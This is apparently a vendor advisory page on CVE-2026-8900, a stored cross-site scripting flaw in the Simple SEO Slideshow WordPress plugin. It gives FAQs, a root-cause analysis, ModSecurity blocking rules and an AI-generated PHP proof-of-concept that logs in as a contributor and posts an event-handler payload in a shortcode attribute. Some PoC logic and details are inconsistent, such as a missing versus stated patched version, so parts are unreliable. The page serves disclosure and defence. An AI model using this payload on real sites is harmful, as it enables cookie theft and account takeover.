What is CVE-2026-8900?

CVE-2026-8900 is a stored cross-site scripting (XSS) vulnerability found in the Simple SEO Slideshow plugin for WordPress, affecting versions up to 1.2.8. It allows authenticated users with contributor-level access or higher to inject arbitrary scripts via shortcode attributes.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping of shortcode attributes. When an attacker uses a shortcode with malicious input, the script is stored in the database and executed whenever a user views the affected post.

Who is affected by this vulnerability?

Any WordPress site using the Simple SEO Slideshow plugin version 1.2.8 or earlier is affected. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Simple SEO Slideshow plugin you are using. If it is version 1.2.8 or earlier, your site is susceptible to CVE-2026-8900.

What is the CVSS score and what does it mean?

CVE-2026-8900 has a CVSS score of 6.4, indicating a medium severity level. This score reflects the potential impact of the vulnerability, which can lead to arbitrary script execution without requiring user interaction.

How can I fix CVE-2026-8900?

To fix CVE-2026-8900, update the Simple SEO Slideshow plugin to version 1.2.9 or later, which includes the necessary patches. Additionally, ensure that proper input sanitization and output escaping practices are followed in your code.

What are the risks associated with this vulnerability?

If exploited, this vulnerability could allow attackers to execute scripts that steal session cookies, perform actions on behalf of users, or redirect visitors to malicious sites. The persistent nature of the payload means it affects all subsequent visitors to the site.

What is a proof of concept (PoC) for this vulnerability?

The proof of concept for CVE-2026-8900 demonstrates how an authenticated user can inject a stored XSS payload via a shortcode attribute. It outlines the steps needed to log in, create a post with a malicious shortcode, and confirm that the payload executes for viewers.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the Simple SEO Slideshow plugin until a patch can be applied. Additionally, review user roles and limit contributor-level access to trusted users only.

Are there any additional security measures I should take?

In addition to updating the plugin, regularly review user permissions, implement a web application firewall (WAF), and conduct security audits to identify and mitigate potential vulnerabilities.

How does this vulnerability relate to WordPress KSES?

WordPress KSES is responsible for sanitizing input data. However, in this case, it does not strip malicious shortcode attribute values on post save, which allows the vulnerability to persist and be exploited by attackers.

What is the recommended action for site administrators?

Site administrators should immediately check the version of the Simple SEO Slideshow plugin, update to the latest version, and review user roles to prevent unauthorized access. Regular monitoring and security practices should also be reinforced.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 12, 2026

CVE-2026-8900: Simple SEO Slideshow <= 1.2.8 Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes PoC, Patch Analysis & Rule

CVE ID CVE-2026-8900

Plugin simple-seo-slideshow

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.2.8

Patched Version —

Disclosed June 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-8900 (metadata-based):

This vulnerability affects the Simple SEO Slideshow plugin for WordPress, up to version 1.2.8. The issue is a stored cross-site scripting (XSS) vulnerability that can be triggered via shortcode attributes. An authenticated attacker with contributor-level access or above can inject arbitrary web scripts into posts or pages. The CVSS score of 6.4 reflects a medium severity, but attacks require low privileges and no user interaction, and the impact is modified via scope change (C:L/I:L/A:N).

The root cause is insufficient input sanitization and output escaping of shortcode attributes. The plugin likely processes shortcode attributes (e.g., [simple-seo-slideshow attr=”value”]) without properly sanitizing the values before rendering them in the page HTML. WordPress KSES sanitization does not strip malicious attributes from shortcode values on post save, which allows contributor-level users to persist payloads. Atomic Edge analysis infers that the vulnerable code likely uses a function like `shortcode_atts()` but fails to apply `esc_attr()` or `wp_kses()` to attribute values before output, or attribute values are echoed directly into JavaScript event handlers or HTML context without proper encoding.

Exploitation requires an authenticated user with contributor privileges or higher. The attacker creates or edits a post or page containing a shortcode from the Simple SEO Slideshow plugin. The malicious input is placed in a shortcode attribute (e.g., `[simple-seo-slideshow title=”alert(1)”]`). When any user (including admins) views the post, the injected script executes in their browser. The attack vector is through the WordPress post editor (block editor or classic editor) where shortcode attributes are accepted.

Remediation should ensure that the plugin properly sanitizes and escapes shortcode attribute values. The developer should use `esc_attr()` when outputting attribute values in HTML context, or apply `wp_kses()` or `sanitize_text_field()` on input. Version 1.2.9 is patched, likely by adding proper output escaping or input sanitization on shortcode attributes.

Impact includes arbitrary script execution in the context of the affected site. An attacker could steal session cookies, perform actions on behalf of an administrator (e.g., create new admin users), redirect visitors to malicious sites, or deface the site. Since the payload persists in the database, it affects all subsequent visitors.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_METHOD "@streq POST" "id:20268900,phase:2,deny,status:403,msg:'CVE-2026-8900 - Simple SEO Slideshow stored XSS via shortcode attributes',severity:'CRITICAL',tag:'CVE-2026-8900',chain"
SecRule REQUEST_URI "@rx ^/wp-json/wp/v2/posts$" "chain"
SecRule ARGS:content "@rx <[^>]*script|[^a-zA-Z]on(load|mouseover|focus|click|error|submit|change|keydown|keyup|blur)[^a-zA-Z]" "t:lowercase"

SecRule REQUEST_METHOD "@streq POST" "id:20268901,phase:2,deny,status:403,msg:'CVE-2026-8900 - Simple SEO Slideshow stored XSS via shortcode attributes',severity:'CRITICAL',tag:'CVE-2026-8900',chain"
SecRule REQUEST_URI "@rx ^/wp-admin/admin-ajax.php$" "chain"
SecRule ARGS_POST:action "@streq wp_ajax_inline-save" "chain"
SecRule ARGS_POST:content "@rx <[^>]*script|[^a-zA-Z]on(load|mouseover|focus|click|error|submit|change|keydown|keyup|blur)[^a-zA-Z]" "t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
/*
 * Atomic Edge CVE Research - Proof of Concept (metadata-based)
 * CVE-2026-8900 - Simple SEO Slideshow <= 1.2.8 - Authenticated (Contributor+) Stored XSS via Shortcode Attributes
 *
 * This script demonstrates how an authenticated contributor-level user can inject a stored XSS payload
 * via a shortcode attribute in a post. The payload will execute for any visitor viewing the post.
 *
 * Prerequisites:
 * - WordPress site with Simple SEO Slideshow plugin installed and activated.
 * - An attacker account with at least Contributor role (username + password).
 * - The target site URL is set in $target_url.
 *
 * Steps performed:
 * 1. Login to obtain cookies and nonce.
 * 2. Create a new post (or update an existing one) containing the vulnerable shortcode with XSS payload.
 * 3. Confirm the post is published and the payload is stored.
 */

// Configuration
$target_url = 'http://example.com';  // Change to the target WordPress site URL
$username   = 'attacker';            // WordPress username (contributor+)
$password   = 'attacker_password';   // WordPress password

// XSS payload to be injected into shortcode attribute (e.g., title)
// The payload uses a benign alert to demonstrate XSS without causing harm
$xss_payload = '" onfocus="alert(1)" autofocus="';

// Full shortcode with payload
$shortcode   = '[simple-seo-slideshow title="' . $xss_payload . '"]';

// ============================================
// Step 1: Login to WordPress
// ============================================
$login_url = $target_url . '/wp-login.php';
$post_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36');
$response = curl_exec($ch);

if (curl_error($ch)) {
    die('Login failed: ' . curl_error($ch) . "n");
}

// ============================================
// Step 2: Get nonce and create post
// ============================================
// First, access the post editor to get the nonce
$editor_url = $target_url . '/wp-admin/post-new.php';
curl_setopt($ch, CURLOPT_URL, $editor_url);
curl_setopt($ch, CURLOPT_POST, 0);
$editor_response = curl_exec($ch);

// Extract _wpnonce from the page (for the classic editor) - fallback to using admin-ajax
// Since we don't know editor type, we'll use wp_ajax to create a post via REST API
// But for simplicity, we'll directly POST using the nonce obtained from editor (if classic)
// Alternatively, use the REST API which is simpler for contributors

// For this PoC, we'll use the WordPress REST API (requires application passwords or cookie auth)
// Alternatively, we can directly create a post via admin-post with proper action

// Let's use a simpler approach: direct POST to admin-ajax to create a post via wp_ajax_inline-save
// But that requires specific AJAX actions. Instead, we'll use the REST API with cookie auth.

$rest_url = $target_url . '/wp-json/wp/v2/posts';

$post_data_rest = array(
    'title'   => 'Atomic Edge PoC - XSS Test',
    'content' => $shortcode,
    'status'  => 'publish'
);

curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data_rest));
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/json',
    'X-WP-Nonce: ' . ''   // We need to obtain the REST nonce
));

// Obtain REST nonce first
$nonce_url = $target_url . '/wp-admin/admin-ajax.php?action=rest-nonce';
curl_setopt($ch, CURLOPT_URL, $nonce_url);
curl_setopt($ch, CURLOPT_POST, 0);
$nonce_response = curl_exec($ch);
$rest_nonce = trim($nonce_response);

if (empty($rest_nonce)) {
    // Attempt to get nonce from the editor page
    preg_match('/var wpApiSettings = .*"nonce":"([^"]+)"/', $editor_response, $matches);
    if (isset($matches[1])) {
        $rest_nonce = $matches[1];
    } else {
        die('Could not obtain REST nonce. Trying alternative approach...n');
    }
}

// Retry with nonce
curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data_rest));
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/json',
    'X-WP-Nonce: ' . $rest_nonce
));
$post_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

curl_close($ch);

if ($http_code == 201 || $http_code == 200) {
    $post_data = json_decode($post_response, true);
    echo "PoC successful. Post created with ID: " . $post_data['id'] . "n";
    echo "Visit: " . $post_data['link'] . " to see XSS payload execute.n";
} else {
    echo "Failed to create post. HTTP code: $http_coden";
    echo "Response: $post_responsen";
    echo "Note: The REST API may require application passwords. Consider using classic editor method.n";
}

// Clean up cookies
unlink('/tmp/cookies.txt');

Frequently Asked Questions

What is CVE-2026-8900?
Overview of the vulnerability
CVE-2026-8900 is a stored cross-site scripting (XSS) vulnerability found in the Simple SEO Slideshow plugin for WordPress, affecting versions up to 1.2.8. It allows authenticated users with contributor-level access or higher to inject arbitrary scripts via shortcode attributes.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping of shortcode attributes. When an attacker uses a shortcode with malicious input, the script is stored in the database and executed whenever a user views the affected post.
Who is affected by this vulnerability?
Identifying affected users
Any WordPress site using the Simple SEO Slideshow plugin version 1.2.8 or earlier is affected. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the Simple SEO Slideshow plugin you are using. If it is version 1.2.8 or earlier, your site is susceptible to CVE-2026-8900.
What is the CVSS score and what does it mean?
Understanding the severity rating
CVE-2026-8900 has a CVSS score of 6.4, indicating a medium severity level. This score reflects the potential impact of the vulnerability, which can lead to arbitrary script execution without requiring user interaction.
How can I fix CVE-2026-8900?
Remediation steps
To fix CVE-2026-8900, update the Simple SEO Slideshow plugin to version 1.2.9 or later, which includes the necessary patches. Additionally, ensure that proper input sanitization and output escaping practices are followed in your code.
What are the risks associated with this vulnerability?
Potential impact of exploitation
If exploited, this vulnerability could allow attackers to execute scripts that steal session cookies, perform actions on behalf of users, or redirect visitors to malicious sites. The persistent nature of the payload means it affects all subsequent visitors to the site.
What is a proof of concept (PoC) for this vulnerability?
Demonstration of the exploit
The proof of concept for CVE-2026-8900 demonstrates how an authenticated user can inject a stored XSS payload via a shortcode attribute. It outlines the steps needed to log in, create a post with a malicious shortcode, and confirm that the payload executes for viewers.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider disabling the Simple SEO Slideshow plugin until a patch can be applied. Additionally, review user roles and limit contributor-level access to trusted users only.
Are there any additional security measures I should take?
Best practices for WordPress security
In addition to updating the plugin, regularly review user permissions, implement a web application firewall (WAF), and conduct security audits to identify and mitigate potential vulnerabilities.
How does this vulnerability relate to WordPress KSES?
Role of KSES in vulnerability
WordPress KSES is responsible for sanitizing input data. However, in this case, it does not strip malicious shortcode attribute values on post save, which allows the vulnerability to persist and be exploited by attackers.
What is the recommended action for site administrators?
Immediate steps to take
Site administrators should immediately check the version of the Simple SEO Slideshow plugin, update to the latest version, and review user roles to prevent unauthorized access. Regular monitoring and security practices should also be reinforced.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations